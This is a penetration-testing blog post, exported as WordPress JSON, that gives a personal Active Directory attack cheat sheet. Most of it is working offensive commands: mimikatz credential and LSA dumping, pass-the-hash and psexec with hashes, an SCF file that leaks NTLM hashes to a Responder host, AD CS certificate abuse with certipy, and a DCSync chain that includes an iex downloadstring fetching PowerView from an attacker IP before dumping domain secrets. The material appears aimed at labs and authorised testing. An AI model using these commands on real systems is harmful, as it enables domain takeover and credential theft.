{"id":706,"date":"2025-02-15T23:03:11","date_gmt":"2025-02-15T23:03:11","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=706"},"modified":"2025-08-04T23:09:09","modified_gmt":"2025-08-04T23:09:09","slug":"adref-active-directory-reference","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/adref-active-directory-reference\/","title":{"rendered":"adref - Active Directory Reference"},"content":{"rendered":"\n<div class=\"wp-block-cover aligncenter\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\"><\/span><img loading=\"lazy\" decoding=\"async\" width=\"1022\" height=\"560\" class=\"wp-block-cover__image-background wp-image-708\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2025\/02\/Screenshot-2025-02-15-175357.png\" data-object-fit=\"cover\"\/><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-text-align-center has-large-font-size\">Having trouble with AD?<\/p>\n<\/div><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><em>Here's my ADREF.<\/em><br><\/p>\n\n\n\n<pre id=\"adref\" class=\"wp-block-code\"><code>=========================================================\n&#91;GTFOBins for Active Directory? Yes please!]\nhttps:&#47;&#47;wadcoms.github.io\n=========================================================\n\n&#91;ntlmrelay]\nhttps:\/\/raw.githubusercontent.com\/SecureAuthCorp\/impacket\/master\/examples\/ntlmrelayx.py\n\n=========================================================\nPowershell\n&#91;Script (.ps1) disabled]\nSet-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope LocalMachine\n\n$Bling$\n\nmimikatz.exe\nprivilege::debug\nsekurlsa::logonpasswords\n&#91;LOCATE NTLM\\* SHA1 HASHES]\n\n=========================================================\n&#91;Core net Commands]\nnet user\nnet user \/DOMAIN\nnet group \/DOMAIN\nnet share\nnet localgroup\n\n=========================================================\nGetSPN.ps1\nInvoke-Kerberoast.ps1\nPowerView.ps1\nSpray-Creds.ps1\n\n=========================================================\nPowershell\n&#91;Get Current Domain and fun]\n&#91;DirectoryServices.ActiveDirectory.ActiveDirectorySite]::GetComputerSite().Servers\n&#91;System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()\n&#91;DirectoryServices.ActiveDirectory.ActiveDirectorySite]::GetComputerSite().Servers | Select-Object -ExpandProperty Name\n\n=========================================================\n&#91;AD - Overpass The Hash]\nprivilege::debug\nsekurlsa::logonpasswords\n&lt;USERNAME>\nsekurlsa::tickets\n&#91;Group 0 - Ticket Granting Service]\n* Username: &lt;USER>\nsekurlsa::pth \/user:&lt;USER> \/domain:corp.com \/ntlm:&lt;NTLM_HASH> \/run:PowerShell.exe\n\n=========================================================\n&#91;PSEXEC Reference]\npsexec.py &lt;MACHINE>\/&lt;USER>:PASS@$IP\nExample:\npsexec.py THINC\/aduser:adpass@x.x.x.x\n\n=========================================================\n&#91;We can Write to a Share?]\n.......What can we do?\n\n# TO START - we're either Enumerating AD with NO CREDENTIALS\n# OR\n# We are Enumerating AD WITH CREDENTIALS. \n# If we have credentials, we can do a lot more from an automation standpoint but privilege escalation will still remain an issue.\n\n1. Scan the network. Find machines and open ports to exploit a service, with our payload sending back the current logged-in or exploited \n   user's NTLMv2 hash via LLMNR poisoning.\n\n2. Enumerate DNS, subdomains, etc., to find key servers like printers or open shares that can be leveraged for an LLMNR poisoning attack to retrieve an NTLMv2 hash.\n\n3. Deploy tools like evil-ssdp or evil-winrm if Active Directory credentials are available.\n\n4. Use KERBRUTE to brute force usernames using Kerberos error messages like `KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN` to identify valid accounts.\n\n5. Access a network share with a NULL Session to place an SCF file to trigger the Lan Manager Service.\n\nExample SCF File:\n&#91;shell]\nCommand=2\nIconFile=\\\\&lt;RESPONDER-IP>\\share\\test.ico\n&#91;Taskbar]\nCommand=ToggleDesktop\n\n6. Exploit PrintNightmare (CVE-2021-1675\/CVE-2021-34527) for domain controller compromise, if possible.\n\n7. Use misconfigured MSSQL servers for code execution via PowerUpSQL:\n   Import-Module .\\PowerUpSQL.psd1\n\n=========================================================\n&#91;AD CS ATTACK]\nntpdate -s ntp.ubuntu.com\nevil-winrm -i somehost.local -u &lt;user_here> -p '&lt;password_here>'\ncertipy find -dc-ip $IP -ns $IP -u &lt;user_here>@somehost.local -p '&lt;password_here>' -vulnerable -stdout\ncertipy ca -ca manager-DC01-CA -add-officer &lt;user_here> -username &lt;user_here>@somehost.local -p '&lt;password_here>'\ncertipy ca -ca manager-DC01-CA -issue-request $current_key -u &lt;user_here>@somehost.local -p '&lt;password_here>'\ncertipy req -ca manager-DC01-CA -target dc01.somehost.local -retrieve 13 -username &lt;user_here>@somehost.local -p '&lt;password_here>'\ncertipy auth -pfx administrator.pfx -dc-ip $IP\nntpdate $IP\ntimedatectl set-ntp off\nrdate -n $IP\ncertipy auth -pfx administrator.pfx -dc-ip $IP | cut -d\":\" -f3\nevil-winrm -i somehost.local -u administrator -H ae5064c2f62317332c88629e025924ef\n\n=========================================================\n&#91;AD - DCSYNC ATTACK]\n\u2022 ldapsearch -x -H ldap:\/\/$IP -b \"dc=htb,dc=local\"\n  -x = Anonymous Login\/NULL SESSIONS\n\n\u2022 WINDAPSEARCH to enumerate users (-U):\n  python \/opt\/windapsearch\/windapsearch.py -d htb.local --dc-ip 10.129.95.210 -U\n\n\u2022 Extract Kerberos pre-auth hashes:\n  GetNPUsers.py htb.local\/svc-alfresco -dc-ip 10.129.95.210 -no-pass\n\n\u2192 &#91;Password CRACKED]\n\n\u2022 Add user to groups:\n  net user siren sirenpassword \/ADD \/DOMAIN\n  net group \"Exchange Windows Permissions\" siren \/ADD\n  net group \"Remote Management Users\" siren \/ADD\n\n\u2022 Use Evil-WinRM for execution:\n  upload powerview.ps1\n  iex(new-object net.webclient).downloadstring('http:\/\/10.10.14.247:8000\/powerview.ps1')\n  $pass = ConvertTo-SecureString 'sirenpassword' -AsPlainText -Force\n  $cred = New-Object System.Management.Automation.PSCredential('htb\\siren', $pass)\n  Add-ObjectACL -PrincipalIdentity siren -Credential $cred -Rights DCSync\n\n\u2022 Dump secrets:\n  secretsdump.py htb\/siren@10.129.95.210\n  psexec.py administrator@10.129.95.210 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6\n\n=========================================================\nC:> .\\mimikatz.exe\nprivilege::debug\ntoken::elevate\nlsadump::cache\n\nprivilige::debug\ntoken::elevate\nlsadump::lsa \/patch\n=========================================================<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"480\" height=\"197\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2025\/02\/thats-right.gif\" alt=\"\" class=\"wp-image-707\"\/><\/figure>\n<\/div>\n\n\n<p><strong>[+]<\/strong> <strong>.bashrc Alias:<\/strong><br><code>alias adref='clear ; cat $HOME\/referencestuff\/adref'<\/code><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Here's my ADREF. [+] .bashrc Alias:alias adref='clear ; cat $HOME\/referencestuff\/adref'<\/p>\n","protected":false},"author":1,"featured_media":708,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[108,110,106,107,111,138,109,2,62],"tags":[157,158],"class_list":["post-706","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-assessment","category-blog","category-cybersecurity","category-engagement","category-guidee","category-infosec","category-penetration-test","category-s1ren","category-theory","tag-active-directory","tag-adref"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/706","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=706"}],"version-history":[{"count":4,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/706\/revisions"}],"predecessor-version":[{"id":776,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/706\/revisions\/776"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/708"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=706"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=706"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=706"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}